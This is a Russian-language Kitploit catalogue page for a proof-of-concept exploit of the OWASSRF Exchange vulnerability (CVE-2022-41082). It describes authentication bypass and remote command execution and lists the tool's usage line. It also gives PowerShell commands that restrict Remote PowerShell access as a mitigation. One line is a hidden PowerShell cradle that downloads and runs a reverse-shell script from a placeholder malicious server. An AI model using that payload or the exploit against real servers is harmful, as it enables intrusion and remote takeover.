Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-41082 — CVE-2022-41082-poc | Kitploit
Инструменты/GitHubGitHub/soltanali0/cve-2022-41082
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubsoltanali0/cve-2022-41082

CVE-2022-41082

CVE-2022-41082-poc

Репозиторий
311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-41082

Этот репозиторий содержит инструмент для демонстрации концепции (PoC) эксплуатации уязвимости OWASSRF (CVE-2022-41082) на серверах Microsoft Exchange. Эксплойт позволяет злоумышленникам выполнять произвольные команды на сервере, потенциально компрометируя систему.

Обзор

Инструмент использует уязвимость OWASSRF для обхода аутентификации и получения удаленного выполнения кода (RCE) на сервере Exchange. Используя эту уязвимость, злоумышленник может выполнять команды так, как если бы он был аутентифицированным пользователем, что приводит к серьезным последствиям для безопасности.

Как это работает

  1. Обход аутентификации: Инструмент подключается к целевому серверу Exchange, обходя механизмы аутентификации с помощью специально созданных запросов.
  2. Удаленное выполнение кода: После успешного входа в систему инструмент открывает сеанс, который позволяет выполнять команды на сервере Exchange.
  3. Выполнение команд: Пользователи могут указать команды для выполнения на сервере, что позволяет выполнять различные действия, включая манипуляции с файлами, сетевые операции или создание обратных оболочек.

Важное замечание

При использовании этого инструмента пожалуйста, убедитесь, что вы держите открытым тот же сеанс командной оболочки Exchange Management Shell. Крайне важно включить удаленный доступ PowerShell хотя бы для одного пользователя после его отключения для остальных. В противном случае вы можете потерять доступ к Management Shell на всех серверах Exchange.

Команды для управления доступом PowerShell

Вот несколько полезных команд PowerShell для проверки и управления доступом:

Проверка доступа PowerShell

Скачать инструмент

Чтобы узнать, какие пользователи имеют доступ Remote PowerShell, а какие нет, выполните:

root@kitploit:~
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'

Отключение доступа PowerShell для всех пользователей

Предупреждение: Будьте осторожны и не закрывайте окно Exchange Management Shell, пока не добавите обратно хотя бы одного пользователя.

Вы можете отключить доступ PowerShell для всех пользователей с помощью следующих команд:

root@kitploit:~
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}

Или используйте одну команду для достижения того же результата:

root@kitploit:~
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false

Повторное включение доступа для конкретного пользователя

Чтобы предоставить доступ Remote PowerShell конкретному пользователю, выполните:

root@kitploit:~
Set-User "guest" -RemotePowerShellEnabled $true

Обходной путь при потере доступа PowerShell

Если вы потеряли доступ PowerShell для всех пользователей, вы можете создать нового пользователя почтового ящика с правами администратора. Этот новый пользователь обойдет примененные политики, что позволит вам снова использовать Exchange Management Shell.

Использование инструмента PoC

Требования

  • Python 3.x
  • Необходимые библиотеки (при необходимости установите через pip)

Запуск инструмента

Чтобы выполнить инструмент PoC, запустите следующую команду:

root@kitploit:~
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>

Замените <target_IP>, <username>, <password> и <command_file> на ваши конкретные значения.

Пример команды для обратной оболочки

Вы можете изменить команду в вашем cmd_file, чтобы включить полезную нагрузку обратной оболочки. Например:

root@kitploit:~
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"

Эта команда загрузит и выполнит скрипт PowerShell с вашего сервера, предоставив вам обратную оболочку.

Ссылки

Для получения дополнительной информации об уязвимости OWASSRF и коде PoC посетите следующую ссылку: OWASSRF CVE-2022-41082 PoC и https://www.youtube.com/watch?v=c2DZYP6jc7g